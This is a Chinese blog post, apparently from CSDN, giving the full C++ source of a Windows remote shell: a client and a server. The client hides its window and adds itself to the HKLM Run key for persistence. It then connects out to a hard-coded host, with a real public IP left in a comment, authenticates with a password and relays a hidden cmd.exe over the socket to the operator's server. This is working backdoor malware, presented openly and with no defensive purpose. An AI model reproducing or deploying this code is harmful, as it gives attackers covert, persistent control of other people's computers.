C++ 远程 shell (cmd)

Client:

#include <stdio.h>#include <Windows.h>#define SEND_BUFF_SIZE 2048/*  interfAcer  *//*欢迎访问我的csdn blog  http://blog.csdn.net/nibiru_holmes*///实现去除执行结果中的 命令字符串+using namespace std; #pragma comment (lib,"ws2_32")#pragma comment (lib,"User32.lib")#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) SOCKET s;void Reg() {TCHAR pFileName[MAX_PATH] = "HGH";HKEY hWrite;DWORD dw = GetModuleFileName(NULL, pFileName, MAX_PATH);RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL,REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS | KEY_WOW64_64KEY, NULL, &hWrite, &dw);RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hWrite);RegSetValueEx(hWrite, "Nibiru Holmes", 0, REG_SZ, (const PBYTE)pFileName, (strlen(pFileName) + 1) * sizeof(TCHAR));}void print(char *cmdstr){while (*((char*)cmdstr++) != '\n');printf(cmdstr);}/*int Connect() {int length = 0;int flag = 0;WSADATA wsData;WSAStartup(MAKEWORD(2, 2), &wsData);s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);sockaddr_in sockaddr;sockaddr.sin_family = PF_INET;sockaddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");sockaddr.sin_port = htons(1000);if (!connect(s, (SOCKADDR*)&sockaddr, sizeof(SOCKADDR))) {flag = 1;printf("connected");}//if (send(s, check, strlen(check) + sizeof(char), NULL)) { flag = 1; }return flag;}*/int Connect(){int length = 0;int flag = 0;WSADATA wsData;WSAStartup(MAKEWORD(2, 2), &wsData);s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);char check[7] = {"nibiru"};sockaddr_in sockaddr;sockaddr.sin_family = PF_INET;sockaddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");    //   115.28.79.163  192.168.1.148sockaddr.sin_port = htons(827);                              //43305if (!connect(s, (SOCKADDR*)&sockaddr, sizeof(SOCKADDR))) {flag = 1;printf("connected");send(s, check,6, NULL);}else return 0;HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2; //四个HANDLE 用来创建两个管道CHAR Buff[SEND_BUFF_SIZE] = { 0 };CHAR sendBuff[SEND_BUFF_SIZE] = ("dir \n");SECURITY_ATTRIBUTES sa;sa.nLength = sizeof(sa);sa.lpSecurityDescriptor = 0;sa.bInheritHandle = true;int ret;if (!CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0))//创建两个匿名管道   {return -1;}if (!CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0)){return -1;}//启动信息STARTUPINFO si;ZeroMemory(&si, sizeof(si));//GetStartupInfo(&si);si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;si.wShowWindow = SW_HIDE;si.hStdInput = hReadPipe2;si.hStdOutput = si.hStdError = hWritePipe1;      //  2输入 1输出char cmdLine[256] = { 0 };GetSystemDirectory(cmdLine, sizeof(cmdLine));strcat(cmdLine, ("\\cmd.exe"));PROCESS_INFORMATION ProcessInformation;if (CreateProcess(cmdLine, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &ProcessInformation) == 0){return -1;}unsigned long lBytesRead, lBytesWrite;//读写数量存放变量//WriteFile(hWritePipe2, "\r\n", 2, &lBytesWrite, 0);while (TRUE) {lBytesRead = 0;ZeroMemory(Buff, sizeof(Buff));ret = PeekNamedPipe(hReadPipe1, Buff, SEND_BUFF_SIZE, &lBytesRead, 0, 0);//if (lBytesRead)//{memset(Buff, 0, sizeof(Buff));ret = ReadFile(hReadPipe1, Buff, SEND_BUFF_SIZE, &lBytesRead, 0);//printf(Buff);send(s, Buff, strlen(Buff)+ sizeof(char), NULL);//}//else {WriteFile(hWritePipe2, "\r\n", 2, &lBytesWrite, 0);//Sleep(100);ret = ReadFile(hReadPipe1, Buff, SEND_BUFF_SIZE, &lBytesWrite, 0);//读取管道里的数据  //读入输入数据  以回车结束char ch;ZeroMemory(sendBuff, sizeof(sendBuff));int count = 0;int check = 0;check=recv(s, sendBuff, MAXBYTE, 0);if (check <= 0) { //PostThreadMessage(ProcessInformation.dwThreadId, WM_QUIT, 0, 0);TerminateProcess(ProcessInformation.hProcess,0);//PostMessage(ProcessInformation.hProcess, WM_CLOSE, 0, 0);break; }if (!WriteFile(hWritePipe2, sendBuff, sizeof(sendBuff), &lBytesWrite, 0)){TerminateProcess(ProcessInformation.hProcess, 0);return -1;}Sleep(100);//}}return 0;}int main() {Reg();while (TRUE) {Connect();}return 0;}

Server:

#include<iostream>#include<winsock2.h>#pragma comment (lib,"ws2_32")/*  interfAcer  *//*欢迎访问我的csdn blog  http://blog.csdn.net/nibiru_holmes*/#pragma comment (lib,"USer32")using namespace std;/*int Connect() {char Recv[MAXBYTE] = { NULL };char Send[MAXBYTE] = { NULL };WSADATA wsaData;WSAStartup(MAKEWORD(2, 2), &wsaData);                        //套接字s用于监听sockaddr_in sockaddr;sockaddr.sin_family = PF_INET;sockaddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");sockaddr.sin_port = htons(1000);bind(s, (SOCKADDR*)&sockaddr, sizeof(sockaddr));SOCKADDR clientAddr = { 0 };int nSize = sizeof(SOCKADDR);SOCKET clientSock;listen(s, 1);                                                                      //进行监听clientSock = accept(s, (SOCKADDR*)&clientAddr, &nSize);if (clientSock) {recv(s, Recv, MAXBYTE, 0);cout << Recv << endl;while (TRUE) {cout << "[*] ";gets_s(Send, MAXBYTE);send(clientSock, Send, sizeof(Send), NULL);recv(s, Recv, MAXBYTE, 0);cout << Recv << endl;}}return 1;}*/DWORD WINAPI funproc(LPVOID lpData)   {AllocConsole();SOCKET  clientSock = *(SOCKET *)lpData;char Recv[2048] = { NULL };char Send[MAXBYTE] = { NULL };struct sockaddr_in sa;int len = sizeof(sa);STARTUPINFO si;ZeroMemory(&si, sizeof(si));si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;si.wShowWindow = SW_SHOW;//si.hStdInput = hReadPipe2;//si.hStdOutput = si.hStdError = hWritePipe1;char cmdLine[] = "cmd.exe";PROCESS_INFORMATION pi;ZeroMemory(&si, sizeof(si));//CreateProcess(NULL, cmdLine, NULL, NULL, 1, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);getpeername(clientSock, (struct sockaddr *)&sa, &len);      //获取socket 目的Ip与port//AllocConsole();//ShellExecute(NULL, "open", "cmd.exe", "命令行", NULL, SW_SHOW);printf("new Thread");printf(" Thread 接受到一个连接：%s:%d\r\n", inet_ntoa(sa.sin_addr), ntohs(sa.sin_port)); //system("pause");while (TRUE) {char ch;int count = 0;//cout << "[*] ";memset(Send, 0, MAXBYTE);//gets_s(Send, MAXBYTE);                           //单管道使用 gets_s  双管道使用 getchar()并将'\n'替换为'\r\n'while ((ch = getchar()) != '\n'){Send[count] = ch;count++;}strcat(Send, "\r\n");send(clientSock, Send, sizeof(Send), NULL);ZeroMemory(Recv, 2048);recv(clientSock, Recv, 2048, 0);cout << Recv;//printf("recv %d",length);}}int main() {HANDLE three[255];   //线程int undernum = 0;  //下标int length = 0;char Recv[2048] = { NULL };char Send[MAXBYTE] = { NULL };struct sockaddr_in sa2;int len2 = sizeof(sa2);WSADATA wsaData;WSAStartup(MAKEWORD(2, 2), &wsaData);//套接字s用于监听SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);sockaddr_in sockaddr;sockaddr.sin_family = PF_INET;sockaddr.sin_addr.S_un.S_addr = inet_addr("0.0.0.0");sockaddr.sin_port = htons(827);SOCKADDR Saddr;int len = 0;char local[] = {"127.0.0.1"};char check[7] = { "nibiru" };char check2[7] = { "" };bind(s, (SOCKADDR*)&sockaddr, sizeof(sockaddr));sockaddr_in clientAddr = { 0 };int nSize = sizeof(SOCKADDR);SOCKET clientSock=0;//[255];listen(s, 1);     //进行监听while (TRUE) {clientSock = accept(s, (SOCKADDR*)&clientAddr, &nSize);Sleep(100);recv(clientSock, check2, 6, 0);if (!strcmp(check,check2)) {//cout << "right" << endl;break;}else printf(" KILL 接受到一个连接 From:%s：%d \r\n", inet_ntoa(clientAddr.sin_addr), ntohs(clientAddr.sin_port));}if (clientSock) {getsockname(clientSock,&Saddr,&len);printf(" 接受到一个连接 From:%s：%d \r\n", inet_ntoa(clientAddr.sin_addr), ntohs(clientAddr.sin_port));//printf(" To：%s：%d \r\n", inet_ntoa(Saddr.), ntohs(clientAddr.sin_port));closesocket(s);//recv(clientSock, Recv, 1024, 0);//cout << Recv << endl;while (TRUE) {char ch;int count = 0;//cout << "[*] ";ZeroMemory(Recv, 2048);recv(clientSock, Recv, 2048, 0);cout << Recv;//printf("recv memset(Send, 0, MAXBYTE);//gets_s(Send, MAXBYTE);                           //单管道使用 gets_s  双管道使用 getchar()并将'\n'替换为'\r\n'while ((ch = getchar()) != '\n'){Send[count] = ch;count++;}strcat(Send, "\r\n");send(clientSock, Send, sizeof(Send), NULL);//%d",length);}//three[undernum] = CreateThread(NULL, 0, funproc, (LPVOID)&clientSock, 0, NULL);//undernum++;//getpeername(clientSock, (struct sockaddr *)&sa2, &len2);//printf(" 接受到一个连接222：%s:%d\r\n", inet_ntoa(sa2.sin_addr), ntohs(sa2.sin_port));}//Sleep(1000);//}   for (int i = 0; i < 255; i++) {closesocket(clientSock);}WSACleanup();printf("out /r/n");system("pause");return 0;}